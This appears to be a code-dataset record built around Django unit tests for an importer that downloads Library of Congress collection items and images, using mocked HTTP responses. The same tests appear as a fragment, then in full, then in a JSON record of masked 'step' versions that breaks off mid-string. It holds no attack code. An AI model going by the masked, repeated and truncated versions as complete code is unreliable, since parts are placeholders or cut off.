with patch('__main__.open', m, create=True):
            result = download_write_collection_item_asset('dumy/image/url', 'foo')
        self.assertEqual(result, True)
@patch('importer.tasks.requests.get')
def test_download_write_asset_item_error(self, mock_get):
"""
        Testing downloading an image when an exception occurs
"""
mock_resp = MockResponse({}, 200, content=Exception('boom'))
mock_get.return_value = mock_resp
m = mock_open()
with patch('__main__.open', m, create=True):
            result = download_write_collection_item_asset('dumy/image/url', 'foo')
        self.assertEqual(result, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
self.url = (
'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'
)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given collection url
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
        mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
        mock_get.side_effect = [mock_resp_page, mock_page1_result,
            mock_page2_result, mock_resp_item_urls]
        mock_save.return_value = None
        download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_collection_item_asstes_no_db_entry(self,
mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given collection url with no db entry in CollectionTaskDetails
"""
mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
        mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
        mock_get.side_effect = [mock_resp_page, mock_page1_result,
            mock_page2_result, mock_resp_item_urls]
        mock_save.return_value = None
        download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = 'branch-rickey-papers'
self.project = 'test-project'
self.item_id = 'mss37820001'
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given item id
"""
collection = {'collection_name': self.name, 'collection_slug':
slugify(self.name), 'collection_task_id': '123',
'subcollection_name': self.project, 'subcollection_slug':
slugify(self.project)}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch('importer.tasks.get_save_item_assets')
@patch('importer.tasks.requests.get')
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given item id with no db entry in CollectionTaskDetails
"""
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,
subcollection_slug=self.project)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,
collection_item_identifier=self.item_id)
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
<|reserved_special_token_1|>
# TODO: Add correct copyright header
import io
from unittest.mock import mock_open, patch
from django.test import TestCase
from importer.models import *
from importer.tasks import *
from importer.tests import mock_data
class MockResponse:
"""
This class will be used by the mock to replace requests.get
"""
    def __init__(self, json_data, status_code, content=None, reason="some error"):
self.json_data = json_data
self.status_code = status_code
self.reason = reason
self.content = content
def json(self):
return self.json_data
def iter_content(self, chunk_size=None):
return io.BytesIO(self.content.encode())
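# Illustrative usage (not part of the tests): MockResponse stands in for a
# requests.Response, exposing only the attributes the importer tasks read.
#   resp = MockResponse({"msg": "ok"}, 200, content="abc")
#   resp.json()                          # -> {"msg": "ok"}
#   resp.status_code                     # -> 200
#   resp.iter_content(chunk_size=1024)   # -> BytesIO over the encoded content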
class GetItemIdFromItemURLTest(TestCase):
def test_get_item_id_from_item_url_with_slash(self):
"""
        Testing get item id from an item url that ends with /
"""
# Arrange
url = "https://www.loc.gov/item/mss859430021/"
# Act
resp = get_item_id_from_item_url(url)
# Assert
self.assertEqual(resp, "mss859430021")
def test_get_item_id_from_item_url_without_slash(self):
"""
        Testing get item id from an item url that does not end with /
"""
# Arrange
url = "https://www.loc.gov/item/mss859430021"
# Act
resp = get_item_id_from_item_url(url)
# Assert
self.assertEqual(resp, "mss859430021")
class GETRequestDataTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
:return:
"""
self.url = "https://www.loc.gov/item/mss859430021?fo=json"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_success_json_data(self, mock_get):
"""get data on success json data"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "success"}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance.json())
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_not_success(self, mock_get):
"""get data on not success"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "bad request"}, 400)
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 400)
self.assertEqual(response, {})
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_request_normal_response(self, mock_get):
"""if json false return repose object with content"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"msg": "success"}, 200, content="abc")
mock_get.return_value = mock_resp_instance
# Act
response = get_request_data(self.url, json_resp=False)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, mock_resp_instance)
class GetCollectionPagesTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_pages(self, mock_get):
"""
get collection pages successfully with pages info
"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({"pagination": {"total": 10}}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_collection_pages(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 10)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_sucess_no_pages(self, mock_get):
"""
get collection pages successfully with no pages info
"""
# Arrange
# Construct our mock response object, giving it relevant expected behaviours
mock_resp_instance = MockResponse({}, 200)
mock_get.return_value = mock_resp_instance
# Act
response = get_collection_pages(self.url)
# Assert that the request-response cycle completed successfully.
self.assertEqual(mock_resp_instance.status_code, 200)
self.assertEqual(response, 0)
class GetCollectionItemidsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_item_ids(self, mock_get):
"""
        Testing the number of collection item ids available in the given collection url
"""
# Arrange
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
# Act
response = get_collection_item_ids(self.url, 2)
# Assert
self.assertListEqual(response, ["mss37820001"])
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_item_ids_no_ids(self, mock_get):
"""
        Testing when no collection item ids are available in the given collection url
"""
# Arrange
mock_page1_result = MockResponse({}, 200)
mock_page2_result = MockResponse({}, 200)
mock_get.side_effect = [mock_page1_result, mock_page2_result]
# Act
response = get_collection_item_ids(self.url, 2)
        # Assert
self.assertListEqual(response, [])
class GetCollectionItemAssetURLsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.item_id = "mss37820001"
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_asset_urls(self, mock_get):
"""
        Testing the number of collection item asset urls available in the given item id
"""
# Arrange
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
# Act
response = get_collection_item_asset_urls(self.item_id)
# Assert
self.assertListEqual(
response,
[
"http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg"
],
)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_get_collection_no_asset_urls(self, mock_get):
"""
        Testing when no collection item asset urls are available for the given item id
"""
# Arrange
mock_resp = MockResponse({}, 200)
mock_get.return_value = mock_resp
# Act
response = get_collection_item_asset_urls(self.item_id)
# Assert
self.assertListEqual(response, [])
class DownloadWriteCollcetionItemAssetTest(TestCase):
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_asset_item(self, mock_get):
"""
        Testing downloading an image and writing it to disk without error
"""
# Arrange
mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)
mock_get.return_value = mock_resp
m = mock_open()
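        # mock_open() builds a mock preconfigured to behave like the built-in
        # open(), so the test never touches the real filesystem.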
with patch("__main__.open", m, create=True):
# Act
abc = download_write_collection_item_asset("dumy/image/url", "foo")
# Assert
self.assertEquals(abc, True)
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_asset_item_error(self, mock_get):
"""
        Testing downloading an image when an exception occurs
"""
# Arrange
mock_resp = MockResponse({}, 200, content=Exception("boom"))
mock_get.return_value = mock_resp
m = mock_open()
with patch("__main__.open", m, create=True):
# Act
abc = download_write_collection_item_asset("dumy/image/url", "foo")
# Assert
self.assertEquals(abc, False)
class DownloadWriteCollectionItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = "branch-rickey-papers"
self.project = "test-project"
self.item_id = "mss37820001"
self.url = "https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971"
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_collection_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given collection url
"""
# Arrange
collection = {
"collection_name": self.name,
"collection_slug": slugify(self.name),
"collection_task_id": "123",
"subcollection_name": self.project,
"subcollection_slug": slugify(self.project),
}
CollectionTaskDetails.objects.create(**collection)
mock_resp_page = MockResponse({"pagination": {"total": 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
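        # Assigning a list to side_effect makes each successive call to the
        # mocked requests.get return the next queued response in order.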
mock_get.side_effect = [
mock_resp_page,
mock_page1_result,
mock_page2_result,
mock_resp_item_urls,
]
mock_save.return_value = None
# Act
download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_collection_item_asstes_no_db_entry(
self, mock_get, mock_save
):
"""
        Testing the number of collection item asset urls available in the given collection url with no db entry in CollectionTaskDetails
"""
# Arrange
mock_resp_page = MockResponse({"pagination": {"total": 2}}, 200)
mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)
mock_page2_result = MockResponse({}, 200)
mock_resp_item_urls = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.side_effect = [
mock_resp_page,
mock_page1_result,
mock_page2_result,
mock_resp_item_urls,
]
mock_save.return_value = None
# Act
download_write_collection_item_assets(self.name, self.project, self.url)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
class DownloadWriteItemAssetsTest(TestCase):
def setUp(self):
"""
Setting up the required test data input for importer tasks test cases
"""
self.name = "branch-rickey-papers"
self.project = "test-project"
self.item_id = "mss37820001"
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_item_asstes(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given item id
"""
# Arrange
collection = {
"collection_name": self.name,
"collection_slug": slugify(self.name),
"collection_task_id": "123",
"subcollection_name": self.project,
"subcollection_slug": slugify(self.project),
}
CollectionTaskDetails.objects.create(**collection)
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
# Act
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
@patch("importer.tasks.get_save_item_assets")
@patch("importer.tasks.requests.get") # Mock 'requests' module 'get' method.
def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):
"""
        Testing the number of collection item asset urls available in the given item id with no db entry in CollectionTaskDetails
"""
# Arrange
mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)
mock_get.return_value = mock_resp
mock_save.return_value = None
# Act
download_write_item_assets(self.name, self.project, self.item_id)
ctd = CollectionTaskDetails.objects.get(
collection_slug=self.name, subcollection_slug=self.project
)
ciac = CollectionItemAssetCount.objects.get(
collection_task=ctd, collection_item_identifier=self.item_id
)
# Assert
self.assertEqual(ciac.collection_item_asset_count, 1)
self.assertEqual(ciac.collection_item_identifier, self.item_id)
self.assertEqual(ctd.collection_asset_count, 1)
|
flexible
|
{
"blob_id": "b131107d2161634e2c09e0b3ab80dd322d13fbc2",
"index": 2881,
"step-1": "<mask token>\n\n\nclass GetCollectionItemidsTest(TestCase):\n <mask token>\n <mask token>\n <mask token>\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = 
CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n\nclass DownloadWriteItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_item_asstes_no_db_entry(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given item id wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n mock_save.return_value = None\n download_write_item_assets(self.name, self.project, self.item_id)\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd,\n 
collection_item_identifier=self.item_id)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n",
"step-2": "<mask token>\n\n\nclass GETRequestDataTest(TestCase):\n <mask token>\n <mask token>\n\n @patch('importer.tasks.requests.get')\n def test_get_request_not_success(self, mock_get):\n \"\"\"get data on not success\"\"\"\n mock_resp_instance = MockResponse({'msg': 'bad request'}, 400)\n mock_get.return_value = mock_resp_instance\n response = get_request_data(self.url)\n self.assertEqual(mock_resp_instance.status_code, 400)\n self.assertEqual(response, {})\n <mask token>\n\n\nclass GetCollectionPagesTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with pages info\n \"\"\"\n mock_resp_instance = MockResponse({'pagination': {'total': 10}}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 10)\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_sucess_no_pages(self, mock_get):\n \"\"\"\n get collection pages successfully with no pages info\n \"\"\"\n mock_resp_instance = MockResponse({}, 200)\n mock_get.return_value = mock_resp_instance\n response = get_collection_pages(self.url)\n self.assertEqual(mock_resp_instance.status_code, 200)\n self.assertEqual(response, 0)\n\n\nclass GetCollectionItemidsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids available in given collection url\n \"\"\"\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, ['mss37820001'])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_item_ids_no_ids(self, mock_get):\n \"\"\"\n Testing no of collection item ids not availabel collection url\n \"\"\"\n mock_page1_result = MockResponse({}, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_get.side_effect = [mock_page1_result, mock_page2_result]\n response = get_collection_item_ids(self.url, 2)\n self.assertListEqual(response, [])\n\n\nclass GetCollectionItemAssetURLsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.item_id = 'mss37820001'\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_asset_urls(self, mock_get):\n \"\"\"\n Testing no of collection item asset urls available in given item id\n \"\"\"\n mock_resp = MockResponse(mock_data.COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [\n 'http://tile.loc.gov/image-services/iiif/service:mss:mss37820:mss37820-052:08:0001/full/pct:100/0/default.jpg'\n ])\n\n @patch('importer.tasks.requests.get')\n def test_get_collection_no_asset_urls(self, mock_get):\n \"\"\"\n 
Testing no of collection item asset urls not available in given item id\n \"\"\"\n mock_resp = MockResponse({}, 200)\n mock_get.return_value = mock_resp\n response = get_collection_item_asset_urls(self.item_id)\n self.assertListEqual(response, [])\n\n\nclass DownloadWriteCollcetionItemAssetTest(TestCase):\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item(self, mock_get):\n \"\"\"\n Testing download image and write into disk without error\n \"\"\"\n mock_resp = MockResponse({}, 200, content=mock_data.IMAZE_DATA)\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, True)\n\n @patch('importer.tasks.requests.get')\n def test_download_write_asset_item_error(self, mock_get):\n \"\"\"\n Testing download image with exception\n \"\"\"\n mock_resp = MockResponse({}, 200, content=Exception('boom'))\n mock_get.return_value = mock_resp\n m = mock_open()\n with patch('__main__.open', m, create=True):\n abc = download_write_collection_item_asset('dumy/image/url', 'foo')\n self.assertEquals(abc, False)\n\n\nclass DownloadWriteCollectionItemAssetsTest(TestCase):\n\n def setUp(self):\n \"\"\"\n Setting up the required test data input for importer tasks test cases\n \"\"\"\n self.name = 'branch-rickey-papers'\n self.project = 'test-project'\n self.item_id = 'mss37820001'\n self.url = (\n 'https://www.loc.gov/collections/branch-rickey-papers/?fa=partof:branch+rickey+papers:+baseball+file,+1906-1971'\n )\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes(self, mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url\n \"\"\"\n collection = {'collection_name': self.name, 'collection_slug':\n slugify(self.name), 'collection_task_id': '123',\n 'subcollection_name': self.project, 'subcollection_slug':\n slugify(self.project)}\n CollectionTaskDetails.objects.create(**collection)\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n mock_page2_result, mock_resp_item_urls]\n mock_save.return_value = None\n download_write_collection_item_assets(self.name, self.project, self.url\n )\n ctd = CollectionTaskDetails.objects.get(collection_slug=self.name,\n subcollection_slug=self.project)\n ciac = CollectionItemAssetCount.objects.get(collection_task=ctd)\n self.assertEqual(ciac.collection_item_asset_count, 1)\n self.assertEqual(ciac.collection_item_identifier, self.item_id)\n self.assertEqual(ctd.collection_asset_count, 1)\n\n @patch('importer.tasks.get_save_item_assets')\n @patch('importer.tasks.requests.get')\n def test_download_write_collection_item_asstes_no_db_entry(self,\n mock_get, mock_save):\n \"\"\"\n Testing no of collection item asset urls available in given collection url wiht no db entry in CollectionTaskDetails\n \"\"\"\n mock_resp_page = MockResponse({'pagination': {'total': 2}}, 200)\n mock_page1_result = MockResponse(mock_data.ITEM_IDS_DATA, 200)\n mock_page2_result = MockResponse({}, 200)\n mock_resp_item_urls = MockResponse(mock_data.\n COLLECTION_ITEM_URLS_DATA, 200)\n mock_get.side_effect = [mock_resp_page, mock_page1_result,\n 
